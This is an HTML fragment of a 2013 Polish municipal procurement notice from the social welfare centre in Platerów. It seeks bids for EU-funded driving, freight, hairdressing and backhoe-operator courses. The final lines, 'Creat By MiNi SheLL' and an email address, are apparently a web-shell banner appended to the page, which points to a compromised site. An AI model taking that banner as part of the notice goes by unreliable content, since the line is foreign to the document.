<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>referencje , lub inne dokumenty potwierdzające należyte wykonanie usługi</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops-platerow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Platerowie ul. 3 mają 5, 08-210 Platerów 
pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2013 godzina 11:15, miejsce: Gminny Ośrodek Pomocy Społecznej w Platerowie ul. 3 mają 5, 08-210 Platerów 
pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projektu Aktywizacja społeczno - zawodowa bezrobotnych w gminie Platerów współfinansowanego ze środków Europejskiego Funduszu Społecznego i realizowanego przez Gminny Ośrodek Pomocy Społecznej w Platerowie w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet VII, Działanie 7.1, poddziałanie 7.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prawo jazdy kat CE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Realizacja kursu prawa jazdy kat. CE. dla 2 osób odbywać się będzie w terminie od dnia podpisania umowy do 20 grudnia 2013r. zgodnie z harmonogramem ustalonym razem z Wykonawcą po rozstrzygnięciu przetargu. 2.Dzienny wymiar zajęć nie powinien przekroczyć 5 godzin zegarowych z uwzględnieniem przerw.  Ilość godzin szkolenia - 45 godzin na osobę., w tym 20 godzin dydaktycznych 45 min i 25 godzin   praktycznych pełne godziny zegarowe. Uczestnik najpóźniej w dniu rozpoczęcia  szkolenia musi otrzymać: harmonogram szkolenia w formie papierowej
3.Miejsce realizacji szkolenia: zajęcia dydaktyczne - w siedzibie Wykonawcy po jego wyborze maksymalnie 50 km od Platerowa. zajęcia praktyczne  -  w siedzibie Wykonawcy po jego wyborze maksymalnie 50 km od Platerowa. 4.	Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż.
5.Wykonawca niezwłocznie po rozpoczęciu szkolenia przedstawi polisę NNW następstw nieszczęśliwych wypadków potwierdzającą obowiązkowe ubezpieczenie kursanta 6.	Wykonawca zobowiązany jest zapewnić uczestnikom konieczne materiały szkoleniowe prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, w tym jeden komplet do dokumentacji projektu, harmonogram szkolenia oraz przerwy kawowe herbata, kawa, napoje zimne, ciastka, woda.7.Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013. 
8.Zajęcia w ramach kursu zrealizują nauczyciele instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 
9.	Wykonawca do 30 listopada  2013 roku skieruje wszystkie osoby na egzamin Państwowy oraz dokona jego opłaty. 
10.	Wykonawca zapewnia: sprzęt niezbędny do przeprowadzenia szkolenia, materiały szkoleniowe podręczniki i płyty CD z testami egzaminacyjnymi, w tym jeden dodatkowy do dokumentacji projektu,  W koszt Kursu należy wliczyć opłatę za pierwszy egzamin teoretyczny i praktyczny. 
11.	Wykonawca skieruje uczestników i pokryje koszty niezbędnych badań lekarskich. 
12.	Osoby skierowane na szkolenie nie będą posiadały założonego Profil Kandydata na Kierowcę    dlatego Wykonawca zobowiązany jest do skierowania kandydatów na badania lekarskie i wniesienie za niego opłaty w celu uzyskania zaświadczenie lekarza o braku przeciwwskazań do prowadzenia pojazdów oraz badania psychotechniczne. 
13.	Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013. 
14.	Zajęcia w ramach kursu zrealizują wykładowcy i instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 
15.	Wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> szkolenie okresowe na przewóz rzeczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zamawiający do dnia 31 października  skieruje na szkolenie jedną osobę posiadającą prawo jazdy kategorii C wydane przed 10 września 2009 roku.
2.	Ilość godzin szkolenia - 35 godzin na osobę przy czym jedną godzinę zajęć należy rozumieć jako 60 min, 45 minut zajęć, 15 minut przerwy. 
3.	Miejsce realizacji szkolenia: w siedzibie wykonawcy, szkolenie musi się odbywać na terenie miasta Łosice
4.	Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż.
5.	Wykonawca niezwłocznie po rozpoczęciu szkolenia przedstawi polisę NNW (następstw nieszczęśliwych wypadków) potwierdzającą obowiązkowe ubezpieczenie kursanta 
6.	Wykonawca zobowiązany jest zapewnić uczestnikowi konieczne materiały szkoleniowe (prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, w tym jeden komplet do dokumentacji projektu), harmonogram szkolenia oraz przerwy kawowe (herbata, kawa, napoje zimne, ciastka, woda).
7.	Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013. 
8.	Zajęcia w ramach kursu zrealizują nauczyciele instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 
9.	Wykonawca do 13 grudnia  2013 roku skieruje kursanta na egzamin Państwowy oraz dokona jego opłaty. 
10.	Wykonawca zapewnia: sprzęt niezbędny do przeprowadzenia szkolenia, materiały szkoleniowe (podręczniki i płyty CD z testami egzaminacyjnymi, w tym jeden dodatkowy do dokumentacji projektu),  W koszt Kursu należy wliczyć opłatę za pierwszy egzamin teoretyczny i praktyczny. 
11.	Osoba skierowana będzie posiadała niezbędne badania lekarskie. 
12.	Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013. 
13.	Zajęcia w ramach kursu zrealizują wykładowcy i instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 
14.	Wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kurs fryzjerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób 1 
1.	Cel kursu: Zdobycie teoretycznych podstaw oraz praktycznych umiejętności pielęgnacji i stylizacji włosów, organizacji salonu fryzjerskiego.
2.	Ilość godzin szkolenia - minimum 160 godzin, w tym minimum 40 godzin zajęć teoretycznych, minimum 120 godzin zajęć praktycznych.
3.	Miejsce realizacji szkolenia: szkolenie musi się odbywać na terenie miasta Siedlce 
4.	Minimalny zakres tematyczny kursu: anatomia, budowa, właściwości skóry pielęgnacja włosów, strzyżenie damskie i męskie, koloryzacja włosów, dobór fryzury 
i koloru, baleyage, trwała ondulacja, stylizacja fryzur, prostowanie, loczkowania 
z prostownicy,  wiadomości z zakresu materiałów, narzędzi,  kosmetyków, czesanie fryzur wieczorowych, ślubnych i upięć artystycznych, zajęcia praktyczne
5.	Wykonawca ponosi koszt wykonania wymaganych badań lekarskich niezbędnych dla uczestników kursu,
6.	Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników kursu,
7.	Wykonawca zobowiązany jest zapewnić uczestnikom materiały dydaktyczne niezbędne do uczestnictwa w kursie opatrzone w logo Europejskiego Funduszu Społecznego, UE, PO KL. 
8.	Wykonawca zabezpieczy materiały, akcesoria niezbędne do przeprowadzenia części praktycznej kursu.
9.	Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanego do specyfiki kursu z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. Sala szkoleniowa powinna być wyposażona w sprzęt niezbędny do realizacji przedmiotu zamówienia. 
10.	Zamawiający zastrzega sobie prawo do kontroli prowadzonych zajęć, w tym niezapowiedzianej, przez uprawnione organy nadzoru i kontroli. Kontrola może zostać przeprowadzona zarówno w siedzibie zamawiającego, w miejscu realizacji kursu, jak i innym miejscu określonym przez uprawniony podmiot dokonujący kontroli
11.	Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu kserokopie:
	wydanych zaświadczeń potwierdzających udział w kursie oraz  rejestr potwierdzający   ich wydanie. 
dziennika zajęć edukacyjnych (zawierającego listę obecności, wymiar godzin zajęć edukacyjnych, tematy zajęć edukacyjnych)
	zaświadczeń lekarskich
	list potwierdzających odbiór materiałów dydaktycznych zawierających indywidualny numer uczestnika kursu, jego dane osobowe, rodzaj wydanych materiałów dydaktycznych, datę i podpis uczestnika
12. Wykonawca zobowiązany jest zapewnić uczestnikowi konieczne materiały szkoleniowe (prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis,) harmonogram szkolenia oraz przerwy kawowe (herbata, kawa, napoje zimne, ciastka, woda).
13. Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013. 
14. Zajęcia w ramach kursu zrealizują nauczyciele/instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 
15. Wykonawca do 13 grudnia  2013 roku skieruje kursanta na egzamin.
16. Wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> kurs operatora koparko - ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Realizacja kursu Operator koparko - ładowarki dla 1 osoby odbywać się będzie w terminie od dnia podpisania umowy do 13 grudnia 2013 r., zgodnie z harmonogramem ustalonym razem z Wykonawcą po rozstrzygnięciu przetargu. 
2.	Celem szkolenia jest zdobycie teoretycznych i praktycznych umiejętności w zakresie obsługi i budowy koparko - ładowarki, a także uzyskania uprawnień państwowych w zakresie obsługi tego typu sprzętu potwierdzonych wpisem do centralnego rejestru osób uprawnionych.
3.	Liczba godzin zajęć dydaktycznych: 176 godzin. Uczestnik, najpóźniej w dniu rozpoczęcia  szkolenia, musi otrzymać harmonogram szkolenia w formie papierowej.
4.	Częstotliwość zajęć: zajęcia powinny odbywać się w wymiarze do 40 godzin zajęć dydaktycznych w tygodniu,  max 8 godzin lekcyjnych dziennie, lecz nie mniej niż 6 godzin lekcyjnych dziennie, w dni powszednie od poniedziałku do piątku, w godzinach 8.00 - 18.00 - dopuszcza się możliwość zorganizowania zajęć w dni wolne od pracy za zgodą uczestnika.
5.	Miejsce realizacji usługi: zajęcia dydaktyczne w siedzibie Wykonawcy, po jego wyborze, maksymalnie 50 km od Platerowa; zajęcia praktyczne - w siedzibie Wykonawcy po jego wyborze maksymalnie 50 km od Platerowa.
6.	Program szkolenia powinien uwzględniać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępnych w ministerialnych bazach danych.
www.standardyiszkolenia.praca.gov.pl
Materiały szkoleniowe (prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, w tym jeden komplet do dokumentacji projektu), przekazane nieodpłatnie uczestnikowi kursu powinny być adekwatne do treści kursu, dobre jakościowo, przekazywane na początku szkolenia.
7.	Wykonawca winien dysponować ilościowo i jakościowo pomieszczeniami, sprzętem i pomocami dydaktycznymi do potrzeb powyższego szkolenia, z uwzględnieniem  bezpiecznych  i higienicznych warunków pracy i nauki.
8.	Zajęcia w ramach kursu zrealizują nauczyciele instruktorzy Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe.
9.	W trakcie zajęć należy przewidzieć przerwy kawowe w ramach, których Wykonawca zapewni Uczestnikowi kawę, herbatę, napoje, soki, ciastka, paluszki, 
10.	Pomieszczenia, materiały szkoleniowe zapewnione przez Wykonawcę podczas szkolenia teoretycznego oraz zaświadczenia i certyfikaty, muszą być odpowiednio oznakowane poprzez umieszczenie logo Programu Operacyjnego Kapitał Ludzki, informacji o fakcie współfinansowania szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
11.	W ramach realizacji zamówienia Wykonawca zapewni badania lekarskie uczestnikowi celem wydania zaświadczeń o braku przeciwwskazań zdrowotnych do podjęcia zatrudnienia jako operator koparko - ładowarki.
12.	Wykonawca zobowiązany jest ubezpieczyć uczestnika szkolenia od następstw nieszczęśliwych wypadków.
13.	Wykonawca zorganizuje i uwzględni w przedłożonej ofercie koszt przystąpienia do egzaminu państwowego oraz wydanie dokumentów potwierdzających nabycie uprawnień.
14.	Wykonawca jest zobowiązany: 
- prowadzić ewidencję obecności uczestnika kursu,
- do informowania Zamawiającego o powtarzających się nieobecnościach uczestnika w przypadku przekroczenia 10% nieobecności.
15.	Po zakończeniu kursu Wykonawca przeprowadzi ankietę oceniającą kurs.
16.	Po zakończeniu kursu Wykonawca przekaże Zamawiającemu pełną dokumentację kursu, tj. oryginały list obecności, /obecność  na zajęciach uczestnik potwierdza własnoręcznym podpisem, kopie dziennika zajęć, rejestru wydanych oraz kopie zaświadczeń potwierdzających ukończenie szkolenia, oświadczeń uczestnika potwierdzających odbiór materiałów szkoleniowych, kopię polisy ubezpieczenia, kopię  zaświadczenia lekarza  o braku przeciwwskazań zdrowotnych do  obsługi koparko - ładowarki.
17.	Zamawiający dopuszcza możliwość przyłączenia uczestnika kursu do innej grupy szkoleniowej o ile grupa taka będzie w tym czasie kurs odbywała..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com